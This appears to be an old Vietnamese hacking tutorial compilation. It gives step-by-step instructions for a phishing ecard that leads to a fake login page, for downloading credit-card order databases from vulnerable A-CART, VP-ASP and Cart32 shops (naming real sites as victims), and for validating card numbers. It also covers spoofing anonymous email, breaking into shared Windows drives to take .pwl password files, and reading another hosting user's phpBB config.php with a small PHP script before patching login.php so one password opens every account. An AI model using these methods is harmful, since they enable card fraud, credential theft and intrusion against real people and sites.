*Must be over 18, & approved for credit. Not available in TX, AL, AK,
AR,
HI.
Offer subject to change without notice. Copyright 2002 © eCarCredit.com
====================================================
----------------------------------------------------------------------
You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
----------------------------------------------------------------------
giờ sửa thành thế này (dùng notepad hay front page edit link nhận ecard thành link
dẫn tới page fakelogin của các bạn - tuỳ theo victim có email thế nào mà link đến
page để sẵn fake phù hợp ):
Your friend anh lan found a site that they thought you'd like. Check it
out:
http://www.riversongs.net/Flash/you.html
This free tell-a-friend service is made possible by our sponsors:
*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*
**RIVERSONGS BEARY MERRY CHRISTMAS**
http://www.riversongs.com/Flash/bmas.html
*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*
=====================================================
YOU’RE A WINNER!!

No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Don’t miss out on other FREE gifts like, a Bart Simpson Lunch Box,
Batman Comic Books, James Dean glasses, and MORE!!
All gifts are FREE!!
Don’t Miss Out, Click Here While There’s Still Time:
=====================================================
====================================================
NEED A CAR - New or Used?
Good or Problem Credit - eCarCredit will can get your car and the loan
you deserve. Thousands of people across the country have purchased
cars and received auto loans with eCarCredit's help through our
NATIONWIDE NETWORK of auto dealers & lenders.
Don't have perfect credit? You can get a car loan with our FREE 2
minute application!
Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs
from a local dealer at no extra cost.
Click here for your new car TODAY!
*Must be over 18, & approved for credit. Not available in TX, AL, AK,
AR,
HI.
Offer subject to change without notice. Copyright 2002 © eCarCredit.com
====================================================
----------------------------------------------------------------------
You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
----------------------------------------------------------------------
sau khi edit như trên, send email này đến email của victim, victim khi mở mail,

nhận card sẽ thấy màn hình fakelogin và nhập user cũng như password vào
và thế là bạn chỉ cần checkmail để láy pw send về !
chúc các bạn hack vui vẻ
+++++++++++++++++++
Hacking Credit Card
( qua lỗi của A-CART shopping )
A-CART là một ASP shopping card (ứng dụng từ VBScript) được kết hợp từ một số
hàm của VBScript và Access database
lỗ hổng bảo mật được phát hiện bởi nick hx ngày 05/09/02 cho phép bạn có thể
download file database trong những website dùng shopping A-CARD mà không cần
phải có bất cứ một quyền hạn gì trên website đó ! choáng thật !
những thông tin trong file database rất quan trọng, nó có thể chứa nhiều thông tin
như : name, surname, address, e-mail, credit card number, and user's login-
password....
ok, bây giờ chúng ta cùng thực hành lỗi này :
đầu tiên các bạn vào http://google.com ( các bạn có thể vào các site tìm kiếm khác
như http://av.com .... ) search keyword "acart2_0" :
ok, bây giờ bạn đã thấy rất nhiều site bị mắc lỗi này:

do kinh nghiệm mình khuyên các bạn nên chọn những site có dạng
http://url/acart2_0/ ví dụ site http://www.coolrob.com/cart/acart2_0
okies, các bạn có tin rằng mình đownload được file mdb của nó không? không tin à?
thử gõ thêm /acart2_0.mdb vào đằng sau url trên như hình dưới coi !
ngay khi click go! các bạn thấy xuất hiện thông báo save hoặc open file mdb này !
thành công rồi đó !
nhìn màn hình download mới thích thú làm sao !

công việc còn lại là đọc file acart2_0.mdb này! việc này dành cho các bạn
tương tự cho những site bị lỗi này, các bạn còn chờ gì nữa mà không khám phá !
chúc hack vui ve !
+++++++++++++++++++
Hacking Credit Card
( qua lỗi VP-ASP Shopping Cart )
lỗi này cực kỳ nguy hiểm, bởi vì có rất nhiều sỉte shopping sủ dụng phần mềm VP-
ASP !
nếu 1 site bị lỗi này , hacker có thể
+nhìn thấy đường dẫn database/configuration
+thay đổi đương dẫn của file database/configuration
+ download file database/configuration
+đặc biệt : login như administrator của (phần mềm) VP-ASP trên site đó,
hoặc login với quyền admin vào host của site đó ( nếu chúng bị thêm lỗi SQL
injection ) với user và pw đều là 'or''=' ....
trong bài viết này mình sẽ không đi sâu vào hệ thống shopping này và những lỗ
hổng cho phép làm nhiều điều khác, mà rất đơn giản chỉ là hướng dẫn những bạn

nào chưa biết một con đương nhanh nhất để có thể download những file database
chứa đầy credit card trong những site mắc phải lỗi này !!
ok, chúng ta bắt đầu làm việc:
đầu tiên vào http://google.com search từ khoá "shopdisplaycategories" như hình
dưới :
các bạn sẽ thấy vô số site dùng VP-ASP shopping ! tuy nhiên nhiều site đã fix, và
công việc của các bạn là dò tìm những site chưa fix ! các bạn có thể chọn bất cứ
trang nào trong list site dùng phần mềm VP-ASP shopping :
trong bài viết này mình chọn site http://www.theqproject.com làm victim !
khi tìm thấy nó trên google click vào bạn sẽ thấy url :
http://www.theqproject.com/shopping/shopdisplaycategories.asp
url này cho biết tất cả những sản phẩm trên website shopping đó :
công việc tiếp theo là chuyển url
http://www.theqproject.com/shopping/shopdisplaycategories.asp thành url
http://www.theqproject.com/shopping/shopdbtest.asp ngiã là thay
shopdisplaycategories.asp bằng shopdbtest.asp rồi click go như hình dưới :
các bạn sẽ thấy màn hình hiển thị như sau ( chú ý: nếu đã đi được đến đây rồi thì
bạn có 70% cơ hội download được file database )

áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb
]
ta thấy trong ví dụ này
+ [vp-asp site] là http://www.theqproject.com
+[ vp-asp dir] là shopping
+[ xDatabase + .mdb ] là shoping.mdb
vậy ta có thể dowload database tại url
http://www.theqproject.com/shopping/shoping.mdb
như hình dưới đây :
màn hình hỏi save hay open ! wow! thành công rồi đó ! xin chúc mừng !

sau khi save vào máy ( đã setup sẵn microsoft-access 2000 - nằm trong bộ
microsoft-office ) file có hình như sau :
double click chuột vào file db trên các bạn sẽ thấy rất nhiều tab, thông thường những
thông tin trong tab oder là những thông tin mà chúng ta cần tìm kiếm ( cc ), click
lên tab để view :
sau khi click tab oder các bạn sẽ thấy rất nhiều thông tin, nhiều khi có cả cc !
và bây giờ khi bạn đã hiểu cách hack, những site bị lỗi trên có rất nhiều và đang chờ
bạn khám phá ! chúc hack vui vẻ
*thông tin thêm: nếu quá trình view file mdb đòi password, bạn có thể đọc bài
hướng dẫn sử dụng chương trinh PasswarePasswordRecoveryAccess để biết cách phá
passwordo thân ái và chúc thành c

+++++++++++++++++++
Hacking Credit Card
( lỗi Cart32.exe )
trong những bài trước các bạn đã được hướng dẫn rất cụ thể bằng hình ảnh, và được
thực hành ngay
chính vì vậy bài viết này là cơ hội cho bạn tìm tòi và tư duy khi không có hướng dẫn
bằng hình ảnh !
ok, chúng ta bắt đầu bàn đến lỗi này
+tìm Cart32 Sites
tìm nhứng site dạng này rất đơn giản , bạn vào google.com hoặc av.com ( đây là 2
site tìm kiếm lớn nhất thế giới ) sau đó gõ tù khoá Cart32.exe v3
site google (hay av) sẽ mang đến cho bạn tất cả các site cart32.exe với phiên bản
3.0
sau đó click vào 1 link bất kỳ mà google hay av đưa đến cho bạn
+mức độ lỗi của các phiên bản cart32.exe
version 2.5 : tất cả đều bị lỗi
version 3.0 : hầu hết đều bị lỗi
version 3.5a : bị lỗi 1 phần nhỏ
version 4.0 : gần như không bị lỗi
+cách khai thác lỗi
tuỳ thuộc vào mục đích của bạn , khi bạn đã có những site sử dụng cart32.exe
shoping bạn có thể có những "trò đùa" sau:
đầu tiên vào http://www.sitename.com/cgi-bin/cart32.exe/sitename
sau đó chọn một trong các browse sau cho từng chủ để:
Lấy Credit Cards : http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt
hoặc : http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt
Lấy Admin Passwords : http://www.sitename.com/cgi-bin/cart32.ini

Lấy Clients Passwords : http://www.sitename.com/cgi-
bin/cart32.exe/cart32clientlist
Hiển Thị Các Thư Mục : http://www.sitename.com/cgi-bin/cart32.exe/error
lời khuyên : nếu bạn tìm thấy cc trong oder.txt , đừng sử dụng chúng hay cho bất kì
một ai khác ! hê hê hê ! để làm gì à? câu hỏi hay ! thế tôi lại hỏi ngược lại bạn thế
này: bạn có thích nhiều cc hay ít cc? tất nhiên là câu trả lời sẽ là thích nhiều ! thế tại
sao bạn lại không chờ đợi thêm 1 vài tuần để website đó update file oder.txt ?! lúc
nào nhiều nhiều rồi hãy cất lưới bạn à , hì hì
hiểu ý mình không? !
chào thân ái, chúc các bạn hack vui vẻ!
+++++++++++++++++++
hướng dẫn làm một feedback
khi làm website chắc chắn ai cũng muốn làm 1 cái feedback để những người ghé
thăm website đỡ mất thời gian vào email của họ để gửi những ý kiến đóng góp đến
cho admin ( thay vào đó chỉ cần vào feedback send mail )
ok, việc này rất dễ và ở đây mình đã làm sẵn cho các bạn 1 feedback bằng tiếng việt
!download nó ở đây
sau khi download về view file feedback.php bằng notepad và edit email
admin@anhlan.us bằng email của bạn :
các bạn có thể chỉnh sửa màu sắc hay chuyển qua front chữ tiếng anh tuỳ thích, cách
làm như sau:cũng view file feedback.php bằng notepad sau đó chỉnh sửa font và màu
sắc rồi save lại, mình nghĩ việc này rất đơn giản và các bạn chắc chắn tự làm được.
sau khi chỉnh sủa theo ý mình, các bạn upload 3 file feedback.php,style.css và
vietuni.js lên cùng 1 thư mục trên 1 website support php và hàm sendmail

okies, run đường dẫn và thế là xong !
chúc thành công !
+++++++++++++++++++
Some Link For Free Subdomains
www.freeurl.com
www.jwdx.com
www.cjb.net
www.dot.tk
www.v3.com
www.hotredirect.com
www.internetjump.com
www.explode.to
www.zdos.com
www.webalias.com
www.reduce.to
www.warping.to
www.gosurfto.com
www.2000c.net
www.shorturl.com
www.has.it
www.doze.to
www.nigx.net
www.1fx.net
www.soar.to
www.123redirect.com
www.ipfox.com
www.webweaver.nu
www.ohgo.com
www.url-redirection.org
www.aliasnames.com
www.get-2.com
www.myredirector.com
www.dot.nu
www.tr.cx
www.kickme.to
www.rapworld.com/url/
www.dk3.com
www.xiy.net

www.url.animeumbrella.com
www.suite.net/url.htm
www.surftohere.com
www.israd.net
www.ontheweb.nu
www.globalredirect.com
www.flash.to
www.zooming.to
www.emu.vg
www.linkworld.to
www.rename.net
www.url4life.com
www.n2v.net
www.is----ingbrillant.com
www.nethop.com
www.webmask.com
www.heroffice.com
www.crcpl.tsx.org
www.guruguru.to
www.iscool.net
www.dkanet.com
www.r67.com
www.uni.cc
www.fr.fm
www.d.bz
www.e33.de
www.de.vu
www.dd.vu
www.6x.to
www.b4.to
www.b6.to
www.h3.to
www.thx.to
www.rox.to
www.faster.as
www.hop2.de
www.tsx.to
www.tsx.org
www.bootme.to
www.2fbi.de
www.ubb.cc
www.IDz.net
http://zwap.to

những website thông dụng của thư viện điện tử
http://www.idealibrary.com : cung cấp khả năng truy cập tới 175 báo, tạp chí khoa
học của nhiều đại học lớn về các lĩnh vực khác nhau. Rất hữu ích cho các sinh viên và
các nhà ngiên cứu.
http://www.englishclub.com : giúp học tiếng anh theo các chủ để như Grammar,
Business, Fun, Reading, Shop, Teacher's Room. Hướng dẫn viết đơn xin việc . Liên
kêtý với các site học tiếng anh khác và 1 số phần mềm học tiếng anh.
http://www.simtel.net : thư viện điẹn tử cung cấp hàng chục ngìn phần mềm miễn
phí, thuộc nhiều lĩnh vực khác nhau, liên quan trực tiếp đến công nghệ thông tin như
tiện ích, truyền thông, đồ hoạ, ...đến các lĩnh vực khác như hoá học, thiên văn học,
sinh học, địa chất, âm nhạc...sắp sếp theo môi trường sử dụng ddos, win3x, win98...
http://www.encarta.com : website miễn phí của microsoft, là bách khoa thư về mọi
vấn đề, các bài báo về những sự kiện trên thế giới. Công cụ tìm kiếm của site này
cho phép tìm kiếm về nhiều chủ để với phạm vi toàn web.
http://worlbook.com : có chức năng tương tự như encarta, là một công cụ hữu ích
cho sinh viên khi thực hiện các ngiên cứu, viết báo cáo khoa học, biểu đồ.
Links
Chúng tôi xin trân trọng giới thiệu
Some links of vietnam

hack & crack
http://vieteam.com ( site tham khảo toàn diện về PC )
http://vncracking.tsx.org ( site crack lớn của việt nam )
http://phphuoc.htmedsoft.com ( site của anh Phạm Hồng Phước với khá nhiều bài
viết và phần mềm hấp dẫn )
http://end.at/acc (site về account chùa )
http://hackervn.net ( một trong những site lớn nhất về hack của việt nam )
http://viethacker.net ( một trong những site lớn nhất về hack của việt nam )
http://www.polarhome.com/~vicki ( site của nhóm vicki )
http://blackmoont.com ( một site để tham khảo về ibf, trong box invision board theo
thời gian )
http://mitdac.com ( một site cung cấp khá nhiều đồ quí hiếm, khó tìm, cập nhật )
http://binhnx2000.hypermart.net ( site của HKC )
http://hkcvn.com ( site mới của HKC )
http://toolzone.info ( một site tiếng việt về javascript )
music
http://matngoc.net ( một site thảo luận về nhóm Mắt Ngọc )
http://phihungfc.com ( một site thảo luận về Phi Hùng )
http://mytam.info ( site riêng của Mỹ Tâm )
http://ngothanhvan.com ( site riêng của Ngô Thanh Vân )
giới thiệu 1 vài website mới của các bạn vn
Some links of The Worl
hack
crack
music
http://www.rainforestmucsic-borneo.com ( tại đây bạn có thể tìm hiểu về các ca sĩ và
nhạc sĩ từ tất cả mọi nơi trên thế giới
heart
grafic

http://www.photos-2000.com/flowl ( chứa những bức ảnh tuyệt đẹp về các loại hoa
và bạn có thể tải về để làm ảnh nền cho chiếc PC của bạn )
http://www.sg/courtesy/index.htm ( bạn có thể tìm thấy ở đây danh mục của những
trò chơi, những cuộc thi thú vị, thậm chí có thể tải về các wallpaper hay scrensaver
đẹp mắt )
http://moonfruit.com ( cung cấp cho bạn hàng trăm kiểu website khác nhau và bạn
có thể lựa chọn tuỳ ý ---> cho phép giảm thiểu những khó khăn khi làm website của
bạn )
other
http://www.proxy2.de ( một site rất hay để tham khảo về soucre code của guestbook và
shoubox )
3 bước để kiểm tra thẻ tín dụng
5434-8434-2900-1033
Đây có phải là số card đúng không? Chúng ta hãy kiểm tra nó.
Bước 1: kiểm tra loại card
Type
Prefix
Length
MASTERCARD

51-55
16
VISA
4
13, 16
AMEX
34
37
15
Diners Club/
Carte Blanche
300-305
36
38
14
Discover
6011
16
enRoute
2014
2149
15
JCB
3
16
JCB
2131
1800
15
5434-8434-2900-1033 (length = 16)
Đây có thể là thẻ MasterCard - National Westminster Bank
Bước 2: kiểm tra công thức Luhn (mod 10)
- lần lượt lấy các chữ số ở vị trí lẽ nếu lenght chẵn hoặc các chữ số ở vị trí chẵn nếu
length là lẽ nhân cho 2

5 4 3 4 8 4 3 4 2 9 0 0 1 0 3 3
x2 x2 x2 x2 x2 x2 x2 x2
---------------------------------------
10 6 16 6 4 0 2 6
- tính tổng: (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) +
3 = 60
- lấy tổng tính được mod cho 10, nếu số dư bằng 0 nghĩa là đúng, nếu khác 0 nghĩa là sai.
60 mod 10 = 0 - Luhn Check Digit: passed.
Bước 3: kiểm tra checksum
- lần luợt lấy các chữ số ở vị trí lẽ nhân cho 2 ngoại trừ chữ số cuối cùng
5 4 3 4 8 4 3 4 2 9 0 0 1 0 3
x2 x2 x2 x2 x2 x2 x2 x2
---------------------------------------
10 6 16 6 4 0 2 6
- tính tổng(*): (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6)
= 57
- tính tổng các chữ số của tổng(*)
5 + 7 = 12
- lấy kết quả trên nhân cho 10 rồi trừ cho tổng(*), sau đó mod 10, nếu số dư bằng chữ số
cuối cùng của card number nghĩa là đúng, nếu khác nghĩa là sai.
(12 x 10 - 57) % 10 = 3 - Checksum: passed.
5434-8434-2900-1033 - đây là số card hợp lí
Ví dụ 2 : 4128-674-342-188 - hợp lí
- prefix = 4, length = 13 - Valid Visa CV - Citibank
- 4221661446441168 = 60, (60 mod 10) = 0
- 814837838228 = 62, 6 + 2 = 8, (8 x 10 - 62) % 10 = 8
Tuy nhiên bạn chỉ có thể kiểm tra xem số card đúng hay sai thôi. Để sử dụng card, bạn
cần biết thêm thông tin khác về card như người sở hữu card, địa chỉ và số phone của anh
ta, ...
Công cụ hổ trợ: (http://www.elfqrin.com/DisCard.html)

Verify a Credit Card Number
Credit Card #
Generate a Credit Card Number
Choose Pattern
Separator:
Gửi một email nặc danh hay bomb thư :
Trên mạng Internet có rất nhiều software làm việc này nhưng tất cả đều dựa vào một
công cụ cơ bản là telnet.

TELNET ở đâu :
Nếu bạn dùng Windows thì chỉ cần vào start/run đánh vào telnet là bạn có
nó rồi đấy !Trong mục Terminal của Telnet bạn chọn
Preferences/Terminal Option chọn VT100
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Connect/Remote System của Telnet, ở
mục Host Type bạn đánh tên của server mà bạn muốn chuyển thư qua : Ví
dụ : mail.hn.vnn.vn , .....ở mục Port bạn chọn là 25.
Sau đó bạn đánh nội dung tương tự như sau :
HELO bellcore.com
MAIL FROM:hacker@hack.com
RCPT TO:hacker@hack.com
DATA
Nội dung thư ở đây
QUIT
OK, bây giờ bạn có thể tin tưởng rằng bức thư bạn đánh là một lá thư nặc
danh, không ai biết bạn gửi cả !
Chúc các bạn thành công.
BÀI HỌC #2
NVH (c)
Xâm nhập PC khác khi đang Online :
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan
mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.

Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows
thông qua Internet và có thể lấy thông tin của chúng.
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi
dùng Legion hoặc Winhackgold ( Download ở
http://www.hackerclub.com ). Chương trình sẽ scan tất cả các máy có mở
chia sẻ file trên cùng một netbios.
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ
nhận được một địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu
bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.
Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình
vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11
thôi. Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP
bất kì bạn đánh vào, bạn nên đánh số gần nhất với IP của mình, tôi chọn số
12).
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP
nó tìm thấy 1 - 254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn
sẽ nhìn thấy như sau :
Shared resources at 206.11.11.42
Sharename Type Comment
----------------------------------------------
A Disk Floppy
CDRIVE Disk C: Drive
DDRIVE Disk D: Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền
kiểm soát địa chỉ IP đó.
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [computerdirectory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [computerprinter [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE drive: | computerdirectory /DELETE [/YES]
NET USE port: | computerprinter /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to a

shared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to
disconnect all of your connections.
port Specifies the parallel (LPT) port name you
assign to a shared printer.
computer Specifies the name of the computer sharing
the resource.
directory Specifies the name of the shared directory.
printer Specifies the name of the shared printer.
password Specifies the password for the shared
resource, if any.
? Specifies that you want to be prompted for the
password of the shared resource. You don't
need to use this option unless the password is
optional.
/SAVEPW:NO Specifies that the password you type
should not be saved in your password-list
file. You need to retype the password the
next time you connect to this resource.
/YES Carries out the NET USE command without
first prompting you to provide information or
confirm actions.
/DELETE Breaks the specified connection to a shared
resource.
/NO Carries out the NET USE command, responding
with NO automatically when you are prompted
to confirm actions.
/HOME Makes a connection to your HOME directory if
one is specified in your LAN Manager or
Windows NT user account.
To list all of your connections, type NET USE without
options.
To see this information one screen at a time, type the
following at the command prompt:
NET USE /? | MORE
or
NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những
cái có kiểu program filescutètptree.dat, mircdownload, windows*.pwl
...
Chuc các bạn thành công.

Hack Local Site, vd : Hack forum PhpBB :
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của
hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc
nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack
phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ
thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần
chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì
đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của
phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng
lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau :

## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting,
domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên.
Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của
bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được
DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được :
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php

Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của
http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin
panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng
nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật
khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn
để có thể giải mã nó. Nếu các bạn hiểu rõ về kiểu encode này thì các bạn có thể tự tìm cho mình
mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là:
"hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu
như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau :
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tiếp đó tìm đoạn mã sau

else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
Sửa đoạn mã đó thành
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ
nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick
Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ
không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát :
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB
mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng
loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy
nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên
sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ
và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ
không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại
restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người
hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học
hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào
trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ
DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những
cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)

-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,..
